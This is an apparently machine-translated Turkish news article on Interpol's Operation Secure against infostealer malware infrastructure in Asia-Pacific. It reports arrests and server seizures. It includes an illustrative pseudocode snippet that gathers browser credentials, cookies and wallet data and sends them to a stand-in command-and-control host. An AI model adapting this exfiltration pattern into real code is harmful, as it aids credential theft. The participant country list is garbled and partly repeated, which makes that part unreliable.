Interpol’un Operasyonu Secure, Infostealer kötü amaçlı yazılımlarla ilişkili 20.000’den fazla kötü niyetli IP adresinin ve alanının yayından kaldırıldığını gördü.
26 ülkede kolluk kuvvetleri, siber suçlu altyapısını ortadan kaldırmak için işbirliği yaptı ve Asya-Pasifik bölgesindeki dijital tehditlere karşı mücadelede önemli bir adım attı.
Güvenli Operasyon: Bölgesel İşbirliği Hedefli Yayından Kaldı
Ocak -Nisan 2025 arasında, Asya ve Pasifik’teki kolluk kuvvetleri, sunucuları bulmak, suç ağlarını haritalamak ve hedeflenen yayından kaldırma işlemlerini yürütmek için kapsamlı operasyonlar yürüttü.
.png
)
Interpol, önde gelen siber güvenlik firmaları Grup-IB, Kaspersky ve Trend Micro ile yakından koordine edildi ve siber aktivite raporları üretmek için gelişmiş tehdit zekalarından yararlandı.
Bu raporlar, siber ekiplere kritik, eyleme geçirilebilir zeka sağlayarak, tespit edilen şüpheli IP’lerin% 79’unun bozulmasına yol açtı.
Secure Operasyonu, Siber Saldırı (ASPJOC) projesine karşı Asya ve Güney Pasifik Ortak Operasyonları bayrağı altında yürütüldü.
Katılımcı ülkeler arasında Brunei, Kamboçya, Fiji, Hong Kong (Çin), Hindistan, Endonezya, Japonya, Kazakistan, Kiribati, Kore (Rep), Laos, Macau (Çin), Malezya, Maldivler, Nauru, Nepal, Papua Yeni Guinea, Filipinler, Samo, Singa, Solom Lana, Philipinler, Samo, Singa, Solom Lana, Timor-Leste, Tonga ve Vanuatu.
Başlıca sonuçlar arasında:
- 41 Sunucu ele geçirildi
- 100 GB’dan fazla veriye el konuldu
- Küresel olarak yapılan 32 tutuklama
- 216.000’den fazla kurban ve potansiyel kurban bildirildi
Infostealer kötü amaçlı yazılımlarda spot ışığı: teknik mekanizmalar ve etki
Infostealer kötü amaçlı yazılım, siber suçluların mağdurların ağlarına yetkisiz erişim elde etmeleri için birincil bir araç haline gelmiştir.
Bu kötü niyetli programlar, tarayıcı kimlik bilgileri, şifreler, çerezler, kredi kartı detayları ve kripto para cüzdanı verileri dahil olmak üzere enfekte cihazlardan (genellikle ‘bot’ veya tehlikeye atılmış uç noktalar olarak adlandırılır) hassas bilgileri çıkarır.
Tam kaynak kodu nadiren piyasaya sürülse de, bir Infostealer’ın verileri toplayabileceği ve dışarı açabileceği işlemi vurgulayan basitleştirilmiş bir sahte kodu:
pythonimport os
import browser_stealer_module
import data_exfiltration_module
# Collect browser data (credentials, cookies, etc.)
browsers = browser_stealer_module.find_browsers()
stolen_data = browser_stealer_module.collect_data(browsers)
# Collect cryptocurrency wallet information
wallet_data = browser_stealer_module.find_wallets()
stolen_data.update(wallet_data)
# Send collected data to command-and-control server
data_exfiltration_module.send_to_server(stolen_data, "https://malicious-server.example.com")
Not: Bu sadece açıklayıcıdır; Gerçek infosterers çok daha karmaşık ve şaşkındır.
Hasat edildikten sonra, infostealers’tan gelen kütükler yeraltı pazarlarında satılır ve fidye yazılımı, veri ihlalleri ve iş e -posta uzlaşma (BEC) şemaları gibi ikincil saldırılar sağlar.
Bu günlükler daha yıkıcı yükler için ilk dayanak görevi görür.
Büyük tutuklamalar ve teknik zaferler
Vietnam, Sri Lanka ve Nauru’daki yetkililer, Operasyon Operasyonu’nun bir parçası olarak birden fazla baskın düzenlediler:
- Vietnam: 300 milyon VND (11.500 ABD Doları) nakit, SIM kart ve iş kayıt belgeleri olan bir grup lideri de dahil olmak üzere 18 şüpheli tutuklandı. Bu, kurumsal hesapların açılması ve satılması için sofistike bir plana işaret etti.
- Sri Lanka ve Nauru: 14 şüpheli tutuklandı, 12’si Sri Lanka’da ve ikisi Nauru’da; 40 kurban tanımlandı.
- Hong Kong: Polis, Interpol tarafından sağlanan 1.700’den fazla zekayı analiz etti ve 89 ISS’de 117 komuta ve kontrol (C2) sunucusunu belirledi. Bu sunucular kimlik avı, sahtekarlık ve sosyal medya dolandırıcılıklarını başlatmak için merkez görevi gördü.
Komut ve kontrol sunucuları, saldırganların enfekte cihazları kontrol etmesini ve büyük ölçekli kampanyaları uzaktan düzenlemelerini sağlayan siber suçlu altyapının belkemiğidir.
Bu sunucuların yayından kaldırılması, siber suçlu grupların operasyonel kapasitesini ciddi şekilde bozar.
Daha geniş siber güvenlik bağlamı
Operasyon Secure’in başarısı, siber güvenlik topluluğu için birkaç önemli noktayı vurgular:
- İşbirliği İşleri: Kamu-özel ortaklıkları ve uluslararası kolluk koordinasyonu siber suç ağlarının bozulmasında oldukça etkilidir.
- İstihbarat paylaşımı kritiktir: Siber aktivite raporları ve gerçek zamanlı tehdit zekası hızlı, hedefli yanıtlara izin verir.
- Infostealer kötü amaçlı yazılım bir ağ geçididir: Infostealers tarafından sağlanan ilk taban, erken tespit ve hafifletme ihtiyacının altını çizen bir dizi ikincil saldırı sağlar.
Interpol’un Güvenli Operasyonu, küresel siber suçla mücadelede önemli bir kilometre taşını temsil eder.
En az 69 kötü amaçlı yazılım varyantına bağlı 20.000’den fazla kötü niyetli IP ve alandan sökerek, kolluk kuvvetleri güçlü bir mesaj gönderdi: koordineli eylem ve istihbarat paylaşımı, binlerce kişiyi infostealer güdümlü siber saldırıların yıkıcı sonuçlarından alabilir ve kurtaracak.
Interpol’un siber suç direktörü Neal Jetton olarak belirtildi:
“Operasyon Secure, bir kez daha kötü niyetli altyapıyı bozma ve hem bireylere hem de işletmelere büyük ölçekli zararları önleme konusunda istihbarat paylaşımının gücünü bir kez daha gösterdi.”
Siber tehditlerin ölçek ve sofistike artmaya devam etmesiyle, Operasyon Secure’nin başarısı gelecekteki uluslararası siber suç tepkileri için bir plan sunmaktadır.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin